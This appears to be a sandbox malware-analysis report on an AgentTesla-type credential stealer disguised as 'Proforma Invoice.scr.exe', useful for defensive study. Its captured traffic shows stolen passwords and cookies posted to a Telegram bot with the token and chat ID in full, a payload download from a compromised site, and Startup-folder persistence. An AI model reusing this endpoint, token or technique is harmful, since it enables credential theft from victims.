1 | 192.168.2.6 | 49841 | 104.26.13.205 | 443 | 3412 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:14:26 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-10-31 10:14:26 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 10:14:26 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8db2e0d06d6445f6-DFW
2024-10-31 10:14:26 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
Data Ascii: 173.254.250.77


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49879 | 149.154.167.220 | 443 | 3412 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:14:33 UTC | 260 | OUT | POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dcf97349026ea0
Host: api.telegram.org
Content-Length: 981
Expect: 100-continue
Connection: Keep-Alive
2024-10-31 10:14:34 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-10-31 10:14:34 UTC | 981 | OUT | Data Ascii:
-----------------------------8dcf97349026ea0
Content-Disposition: form-data; name="chat_id"

7068829394
-----------------------------8dcf97349026ea0
Content-Disposition: form-data; name="caption"

New PW Recovered!

Time: 10/31/2024 06:14:31
User
2024-10-31 10:14:34 UTC | 402 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0
Date: Thu, 31 Oct 2024 10:14:34 GMT
Content-Type: application/json
Content-Length: 56
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":false,"error_code":400,"description":"Logged out"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49890 | 149.154.167.220 | 443 | 3412 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:14:36 UTC | 236 | OUT | POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dcf98afee4d99a
Host: api.telegram.org
Content-Length: 918
Expect: 100-continue
2024-10-31 10:14:36 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-10-31 10:14:36 UTC | 918 | OUT | Data Ascii:
-----------------------------8dcf98afee4d99a
Content-Disposition: form-data; name="chat_id"

7068829394
-----------------------------8dcf98afee4d99a
Content-Disposition: form-data; name="caption"

New CO Recovered!

Time: 10/31/2024 09:04:15
User
2024-10-31 10:14:36 UTC | 402 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0
Date: Thu, 31 Oct 2024 10:14:36 GMT
Content-Type: application/json
Content-Length: 56
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":false,"error_code":400,"description":"Logged out"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49910 | 173.237.185.182 | 443 | 6828 | C:\Users\user\AppData\Roaming\EncoderFallback.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:14:39 UTC | 80 | OUT | GET /wp-includes/Hjewct.vdf HTTP/1.1
Host: geocs.mx
Connection: Keep-Alive
2024-10-31 10:14:39 UTC | 183 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 10:14:45 GMT
Server: Apache
Last-Modified: Tue, 29 Oct 2024 16:15:46 GMT
Accept-Ranges: bytes
Content-Length: 993808
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 51774 | 104.26.13.205 | 443 | 5868 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:14:55 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-10-31 10:14:56 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 10:14:56 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8db2e1881c20e85f-DFW
2024-10-31 10:14:56 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
Data Ascii: 173.254.250.77


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 51775 | 149.154.167.220 | 443 | 5868 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:14:57 UTC | 260 | OUT | POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dcf973572514ec
Host: api.telegram.org
Content-Length: 981
Expect: 100-continue
Connection: Keep-Alive
2024-10-31 10:14:57 UTC | 981 | OUT | Data Ascii:
-----------------------------8dcf973572514ec
Content-Disposition: form-data; name="chat_id"

7068829394
-----------------------------8dcf973572514ec
Content-Disposition: form-data; name="caption"

New PW Recovered!

Time: 10/31/2024 06:14:55
User
2024-10-31 10:14:58 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-10-31 10:14:58 UTC | 402 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0
Date: Thu, 31 Oct 2024 10:14:58 GMT
Content-Type: application/json
Content-Length: 56
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":false,"error_code":400,"description":"Logged out"}


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        7 | 192.168.2.6 | 51776 | 149.154.167.220 | 443 | 5868 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-31 10:14:59 UTC | 236 | OUT | POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8dcf9857b3d199b
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 918
                                                                                        Expect: 100-continue
                                                                                        2024-10-31 10:14:59 UTC | 918 | OUT | Data Ascii:
                                                                                        -----------------------------8dcf9857b3d199b
                                                                                        Content-Disposition: form-data; name="chat_id"

                                                                                        7068829394
                                                                                        -----------------------------8dcf9857b3d199b
                                                                                        Content-Disposition: form-data; name="caption"

                                                                                        New CO Recovered!

                                                                                        Time: 10/31/2024 08:24:47
                                                                                        User
                                                                                        2024-10-31 10:14:59 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                                        2024-10-31 10:14:59 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 31 Oct 2024 10:14:59 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 56
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":false,"error_code":400,"description":"Logged out"}



                                                                                        Target ID:0
                                                                                        Start time:06:14:04
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Users\user\Desktop\Proforma Invoice.scr.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Proforma Invoice.scr.exe"
                                                                                        Imagebase:0x280000
                                                                                        File size:13'312 bytes
                                                                                        MD5 hash:3EFCF6123CC2697D54BE8E8D17F70EB6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2454133386.0000000002618000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2480782000.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:06:14:24
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                        Imagebase:0x270000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2755078286.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2755078286.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2755078286.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:06:14:36
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs"
                                                                                        Imagebase:0x7ff790870000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:06:14:37
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\EncoderFallback.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\EncoderFallback.exe"
                                                                                        Imagebase:0x8e0000
                                                                                        File size:13'312 bytes
                                                                                        MD5 hash:3EFCF6123CC2697D54BE8E8D17F70EB6
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 61%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:06:14:53
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                        Imagebase:0x5d0000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3529968351.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3529968351.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3529968351.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 663acab1d3fe54f57449945bb60d35ac75fd47e83db8125a964514e8c6108fad
                                                                                          • Instruction ID: dfc9e1f201077eacab27aef09336372b754ce794dfc99c44836653db7af7cc62
                                                                                          • Opcode Fuzzy Hash: 663acab1d3fe54f57449945bb60d35ac75fd47e83db8125a964514e8c6108fad
                                                                                          • Instruction Fuzzy Hash: EC81E535A00658DFCB14EF69C484A9EBBF5FF89310B158169E946DB362DB30ED42CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80ec9248fac95c1efacbad86c658225c2ef24f3b66b0acd8a00faf8cdd716180
                                                                                          • Instruction ID: b79f9fe293deef254d6a96b83778a9114e8936039dacfae62d6ca15b398eb2c3
                                                                                          • Opcode Fuzzy Hash: 80ec9248fac95c1efacbad86c658225c2ef24f3b66b0acd8a00faf8cdd716180
                                                                                          • Instruction Fuzzy Hash: 20714B34B001588FC708DB69D494A6DBBF2FF89711F2584A9E506EB361CB71AC45CF91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5d7a247177ec03f5ab640acee83cd98d965db75be3c4558ad7569a0da054f7f5
                                                                                          • Instruction ID: f85e7d7a10f0e49fbd68a102c80459b0ab6130a005471d7cf8cac1498503a796
                                                                                          • Opcode Fuzzy Hash: 5d7a247177ec03f5ab640acee83cd98d965db75be3c4558ad7569a0da054f7f5
                                                                                          • Instruction Fuzzy Hash: 6B41B7718092989FD702EF68D8A569ABFB0EF07304F1484DAD084DB252DB784A49CB66
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 91c69ee7bdf0f16d8da51fee8221c5b6cfdf088490e075253818ad49c7f95ddd
                                                                                          • Instruction ID: 0e2e677a9c3a83ca2a9a913c8967191acf1fad719edf6b08265b5ba8ff646700
                                                                                          • Opcode Fuzzy Hash: 91c69ee7bdf0f16d8da51fee8221c5b6cfdf088490e075253818ad49c7f95ddd
                                                                                          • Instruction Fuzzy Hash: 83411F70D14248CFDB04DF9AE844BEDBBF6FB8A314F10A02AD519A7295DB74894ACF04
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d9ffcab2cc3ef70de4b9a47865a15cc4106c2a521a23defeddc7cc3a6cf902bc
                                                                                          • Instruction ID: 04fa6c4e3eb34029e29c2e65ba7c6fe34049a4138f452f2d691c350a99233bf9
                                                                                          • Opcode Fuzzy Hash: d9ffcab2cc3ef70de4b9a47865a15cc4106c2a521a23defeddc7cc3a6cf902bc
                                                                                          • Instruction Fuzzy Hash: 3F416C34B002589FC744DFA9D498AAD7BF2FF89310F258469E906EB3A1CE719C45CB51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de8bb320c1fc4ea4a22a07b03147b0cb8b2fca90b7b8ca34c0af30244c639485
                                                                                          • Instruction ID: d99b2c49b30fbb8eba3a1f2144991bdedc97bfa40f86a6c148e98303e5dfd91c
                                                                                          • Opcode Fuzzy Hash: de8bb320c1fc4ea4a22a07b03147b0cb8b2fca90b7b8ca34c0af30244c639485
                                                                                          • Instruction Fuzzy Hash: 3B41E734B001148FC744EFA9D498A6DBBF2FF89711B258469E906EB3A1CE719C45CF51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0c4bf54464e67a86e960886f04b5dba9d7e647f9828f5e7ef25f40cf2b44dcf5
                                                                                          • Instruction ID: 0562962fa35b38ba2200912b6c60b398d53dc5cb66dc8b6c5ea269d10358aa24
                                                                                          • Opcode Fuzzy Hash: 0c4bf54464e67a86e960886f04b5dba9d7e647f9828f5e7ef25f40cf2b44dcf5
                                                                                          • Instruction Fuzzy Hash: BC3114B0D012899FDB10CFAAC594ADEBFF5BF49740F248069E909AB350DB359D45CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 235eb5646793d3ae1506ad390d16c950bccd568a7565bc3169822e7f6110be91
                                                                                          • Instruction ID: 64b4cb75750e909acf662621458c7b5fce848148084788ffd0d6d4b8f6013953
                                                                                          • Opcode Fuzzy Hash: 235eb5646793d3ae1506ad390d16c950bccd568a7565bc3169822e7f6110be91
                                                                                          • Instruction Fuzzy Hash: CB3136B0D002899FDF10CFAAC484ADEBBF5BF48740F248029E509AB350DB349940CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453359666.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_83d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3244cc1782b44ca7122c4a0b08eb939ec29cbcfba51251c2b56ca6e38f40fc4f
                                                                                          • Instruction ID: 34917dfce1992d757b45129f8288942520c02da4073147cf39b14aca3f357599
                                                                                          • Opcode Fuzzy Hash: 3244cc1782b44ca7122c4a0b08eb939ec29cbcfba51251c2b56ca6e38f40fc4f
                                                                                          • Instruction Fuzzy Hash: FD21F572604344EFDB15DF14E9C0B26BF65FBC8318F24C569E9098B256C336D856CAE2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453394339.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_84d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f75ca01aacd8cd060b9aec934495f5456393fa9b42caa5bb11aa67f9298eaee
                                                                                          • Instruction ID: 56ea240e7649f52bf7b0d69c54ac26609429192a534bd45882358ba4d75de73a
                                                                                          • Opcode Fuzzy Hash: 5f75ca01aacd8cd060b9aec934495f5456393fa9b42caa5bb11aa67f9298eaee
                                                                                          • Instruction Fuzzy Hash: 92210771604748DFDB15DF14D9C4B26BFA5FB84314F24C569ED098B246C33AD806CBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6a4bddc9ae5bf0cf8309a74481bc0fe93bde8531cd145a62f103af948b02245
                                                                                          • Instruction ID: 1f2d54100e217fd0d855ca1897d11a1f3fcd9e8c64c40be36c8c44e844ce06aa
                                                                                          • Opcode Fuzzy Hash: f6a4bddc9ae5bf0cf8309a74481bc0fe93bde8531cd145a62f103af948b02245
                                                                                          • Instruction Fuzzy Hash: 35215978E14209DFDB04DFA9E848BBEBBB6FF89300F109025D415A3295DB385A09CF91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a4b3dfd9ffbd43a85e30634bab8986172ae8bf414340e0f96f74537ca60ddec
                                                                                          • Instruction ID: 0eb300350a2aa2a2c0442c0ddf19f08e0fedf8ea02a079eb8f65a74d9aa5760f
                                                                                          • Opcode Fuzzy Hash: 5a4b3dfd9ffbd43a85e30634bab8986172ae8bf414340e0f96f74537ca60ddec
                                                                                          • Instruction Fuzzy Hash: 382188B0908648DFE740EFAAD4497ADBBF5FB4A304F6084A9D009E3251DBB44A88DF05
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ae1f7be6fd0112b7e483bea41b9b4faa6c7890b1252ffce5e9eece34581536d
                                                                                          • Instruction ID: b43b575a6ca22cb92fdc0c2096ecf985fa368e3d06537c811b4a4f7b995629cf
